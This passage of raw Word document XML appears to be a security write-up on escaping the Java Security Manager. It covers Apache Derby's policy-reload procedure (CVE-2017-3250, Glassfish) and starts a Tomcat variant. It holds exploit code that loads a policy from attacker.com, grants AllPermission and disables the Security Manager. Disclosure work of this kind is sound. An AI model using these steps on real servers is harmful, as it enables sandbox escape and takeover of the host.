          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>        new PrivilegedAction&lt;Object&gt;() {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>            public Object run() {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>                Policy.getPolicy().refresh();</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>                return null;</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>            }</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>        }</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    );</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>} catch (SecurityException se) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    throw Util.policyNotReloaded(se);</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Since the call to </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java.security.Policy.refresh()</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> is invoked from within a privileged block of a privileged class, the Security Manager will only check the call stack frames of the privileged derby class and allow the refresh operation, effectively setting our malicious policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A simple exploit will look like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System.setProperty("java.security.policy", "</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://attacker.com/evil_perm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.apache.derby.catalog.SystemProcedures.SYSCS_RELOAD_SECURITY_POLICY();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System.setSecurityManager(null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Where our malicious policy will be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grant { permission java.security.AllPermission; };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE: CVE-2017-3250</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Oracle January 2017 CPU</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Supported versions affected:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Oracle Glassfish Server 3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Oracle Glassfish Server 3.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Oracle Glassfish Server 2.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache Tomcat 6,7,8 and 9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Default policy is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conf/catalina.policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> (see: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://tomcat.apache.org/tomcat-9.0-doc/security-manager-howto.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In this case we will use two policy items:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grant codeBase "file:${catalina.home}/lib/-" { permission java.security.AllPermission; };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grant { permission java.lang.RuntimePermission "accessClassInPackage.org.apache.jasper.runtime"; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We will, again, look for a privileged block on any of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AllPermission</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> We will be using "</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.apache.jasper.runtime.JspRuntimeLibrary</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
